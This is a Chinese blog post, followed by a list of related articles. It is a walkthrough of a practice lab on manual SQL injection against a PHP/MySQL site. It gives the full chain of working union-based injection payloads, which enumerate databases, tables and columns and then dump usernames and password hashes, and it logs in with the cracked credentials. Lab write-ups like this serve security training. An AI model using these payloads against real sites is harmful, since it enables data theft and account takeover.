手工注入测试(MySQL)

最新推荐文章于 2024-04-16 13:47:45 发布
最新推荐文章于 2024-04-16 13:47:45 发布
阅读量733 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44926231/article/details/93618333
版权

环境:https://www.mozhe.cn/bug/detail/82

环境:Nginx+PHP+MySQL
这是墨者学院的一个测试题,让我们用手工的方式对数据库进行注入得到信息登陆,拿到key。

注入原理

  1. 参数用户可控。
  2. 参数未过滤就带入数据库查询。

凡是满足这两点,皆可产生注入漏洞,攻击者进一步构造payload进行拼接sql语句导致数据泄露,甚至网站、服务器权限被获取。
因此,开发者必须秉承着外部参数不可信的原则进行开发。

寻找注入点

既然这是一道手工注入的测试题,那首先必须找到注入点。
打开链接看到如下界面:在这里插入图片描述
没有其他花里胡哨的链接,我们可以很轻松的找到公告,点击发现这应该就是我们要找的注入点(待确定,因为实在没有其他东西了哈哈)。
http://219.153.49.228:46624/new_list.php?id=1
在这里插入图片描述

如果你真的没找到,也可以扫一下后台。
在这里插入图片描述

判断是否存在注入

http://219.153.49.228:46624/new_list.php?id=1-0 减去0,发现返回正常
http://219.153.49.228:46624/new_list.php?id=1‘ 单引号 报错
在这里插入图片描述

在这里插入图片描述
由此可以判断,该页面存在注入,注入点为id。

判断字段

构造语句 ~?id=1 order by 10 报错,说明字段数少于10个。
然后二分法取5.
构造语句 ~?id=1 order by 5还是报错,说明字段数少于5个。
继续二分法取3.
构造语句 ~?id=1 order by 3页面返回正常,说明字段数大于3个。
构造语句 ~?id=1 order by 4页面返回正常,刚才5报错,可得出字段数为4。
在这里插入图片描述

判断显示的字段

这里用联合查询?id=1 and 1=2 union select 1,2,3,4
在这里插入图片描述

可以看到2,3显示出来,我们可以用这两个字段来查看回显信息。

查看库名和版本信息

?id=1 and 1=2 union select 1,database(),version(),4

在这里插入图片描述
mozhe_Discuz_StormGroup为数据库,5.7.22为数据库版本信息,ubuntu0.16.04.1表示操纵系统乌班图0.16.04.1。
这里的信息不只有这么多,因为看到数据库版本5.7.22,可以知道Mysql会在5.0版本后,默认存在一个名为information_schema的数据库,而这个数据库里有三个对我们非常有用的表,分别是SCHEMATA、TABLE和CLOUMNS.

  1. SCHEMATA里存储的是所有的数据库名,其字段为SCHEMA_NAME。
  2. TABLE表里存储的是所有的数据库名和所有表名,字段分别是TABLE_SCHEMA、TABLE_NAME。
  3. CLOUMNS表存储的是所有的数据库名、表名和列名。字段名分别为TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME。

爆库名

在这里插入图片描述
?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 1,1(显示mozhe_Discuz_StormGroup)
?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 2,1(显示mysql)
?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 3,1(显示performance_schema)
?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 4,1(显示sys)
?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 5,1(报错说明数据库有5个。)
这里直接从1开始查,因为知道第1个数据库是information_schema。以此类推直到网页报错,所查出来的数据库就是全部的数据库。
5个数据库information_schema、mozhe_Discuz_StormGroup、mysql、performance_schema、sys。

爆表名

?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA=‘mozhe_Discuz_StormGroup’ limit 0,1
在这里插入图片描述
同爆库,逐条查看直到报错。得出数据库中的表名。

数据库mozhe_Discuz_StormGroup有2个数据表,StormGroup_member、notice。

爆字段

?id=1 and 1=2 union select 1,COLUMN_NAME,3,4 from information_schema.COLUMNS where TABLE_SCHEMA=‘mozhe_Discuz_StormGroup’ and TABLE_NAME=‘StormGroup_member’ limit 0,1
在这里插入图片描述
同上,逐条查看直到报错。
得出表的列名:id,name,password,status。

爆数据

?id=1 and 1=2 union select 1,CONCAT(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1
在这里插入图片描述

也可以用group_concat全部输出:
在这里插入图片描述
到此为止我们就得到了想要的信息,用户名和密码(md5加密状态)。进行解密
在这里插入图片描述
账号mozhe.密码834430进行登陆得到key.
在这里插入图片描述

康纳倒拔垂杨柳
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL手工注入漏洞测试(MySQL数据库)
chinacqzgp的博客
09-18 1748
墨者学院靶场,sql注入MySQL数据库
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1425
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列名、存储过程等。
手工SQL注入流程与常用语句_sql注入 手工(3),2024年最新看这篇文章准没错
最新发布
2401_83974199的博客
04-16 515
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。进一步获取其中的字段名,假设要获取的表为users,如下面的代码和截图所示。information_schema的columns表存储了表中列的信息,也就是表中字段信息,指定table_name表名,即可获取到对应表的字段信息。是要截取的字符串,b是截取的位置,c是截取的长度。
手工注入方法,方便大家测试程序漏洞
daxin09的专栏
03-03 876
1、加入单引号 ’提交,  结果:如果出现错误提示,则该网站可能就存在注入漏洞。  2、数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)  结果:分别返回不同的页面,说明存在注入漏洞.  分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询, 如果and前后的两条语句都是真的话就不会
个人学习笔记之手工注入测试(Microsoft SQL Server)
weixin_44926231的博客
06-28 1049
个人学习笔记之手工注入测试(Microsoft SQL Server) 启动环境:https://www.mozhe.cn/bug/detail/90 找到注入点 http://219.153.49.228:41537/new_list.asp?id=2-0 返回正常 http://219.153.49.228:41537/new_list.asp?id=2‘ 报错 判断字段 http:...
mysql手工注入演示
大哥一声吼
10-10 1100
演示环境准备: php环境,存在漏洞的php脚本,mysql数据库以及数据表 php环境直接使用phpstudy即可 存在漏洞的脚本文件    <!DOCTYPE html> <html> <head> <title>sql注入测试页面</title> </head> <?php header("Cont
sql server 2008 mysql 手工注入
03-25
总的来说,SQL Server 2008和MySQL手工注入问题可以通过编程最佳实践、使用预处理语句、限制用户权限以及保持系统更新来有效预防。了解这些概念并能实际应用,对于任何IT专业人士,尤其是负责数据库管理和安全的...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、...手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
手工注入教程
09-06
在网络安全领域,手工注入是一种高级的黑客攻击技术,主要用于挖掘和利用数据库系统中的漏洞。这里的“手工注入”指的是不依赖于自动化工具,而是通过手动构造和输入特定的SQL语句来实现对数据库的非法访问。本教程...
PHP+MySQL 手工注入语句大全 推荐
12-18
【PHP+MySQL手工注入语句】是Web安全领域的一个重要话题,主要涉及到SQL注入攻击,这是一种常见的黑客手段,用于利用不安全的SQL查询获取数据库中的敏感信息或执行恶意操作。以下是一些常用的PHP+MySQL手工注入语句...
mssql,access,mysql手工注入详解
10-18
本文将深入探讨针对Microsoft SQL Server(MSSQL)、Access和MySQL数据库的手工注入技术,帮助你理解其工作原理,防范潜在风险。 1. **MSSQL数据库注入** MSSQL注入通常发生在应用程序未能充分验证用户输入时。...
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 943
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1240
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
mysql 注入测试_mysql注入测试
weixin_26821003的博客
01-19 244
转自:http://www.jb51.net/article/46163.htm在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。一、SQL注入的步骤a) 寻找注入点(如:登录界面、留言板等)b) 用户自己构造SQL语句(如:' or...
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1040
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
新手科普 | MySQL手工注入之基本注入流程
THMAIL的博客
08-05 735
MySQL手工注入的基本步骤以及一些技巧的记录,当出现学习手工注入的时候,网上的文章参差不齐,导致很长一段时间对手工注入的理解一直处于一知半解的状态,特此记录本文,让小白们少走些弯路。本文只针对手工注入小白,大牛绕过轻喷。 步骤 注释或者闭合语句 首先看下一个基本的SQL语句查询源码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 下面的步骤默认都是采用这种基本的SQL语句的,其他的注入方法换汤不换药,这里只是想整理下注入的步骤与
XSS靶场练习手工注入(3)
qq_43511094的博客
02-03 279
XSS手工注入前言靶场:http://prompt.ml/0基础知识prompt() 方法:题目1解题思路结果题目2解题思路结果题目3解题思路结果题目4解题思路结果题目5解题思路结果题目6解题思路结果题目7解题思路结果题目8解题思路结果题目9解题思路结果题目10解题思路结果题目11解题思路结果题目12解题思路结果题目13解题思路结果题目14解题思路结果5题目16解题思路结果总结 前言 这篇一篇用来记录自己练习XSS注入的博客,虽然也已经有很多大佬也传了他们的思路和方法,但我的应该是记录最详细的吧(个人感觉)
mysql的渗透_渗透测试MySql注入(一)
weixin_39924179的博客
01-18 535
一、SQL注入条件参数用户可控:前端传递给后端的参数内容是用户可以控制的。参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库执行。二、MySQL注入知识点在mysql5.0之后默认存在一个information_schema数据库,该数据库中有三个表特别重要,分别为:SCHEMATA表、TABLES表、COLUMNS表。SCHEMATA表中SCHEMA_NAME存放该用户创建的所有数据库...
sql手工注入漏洞测试(mysql数据库)
06-28
SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值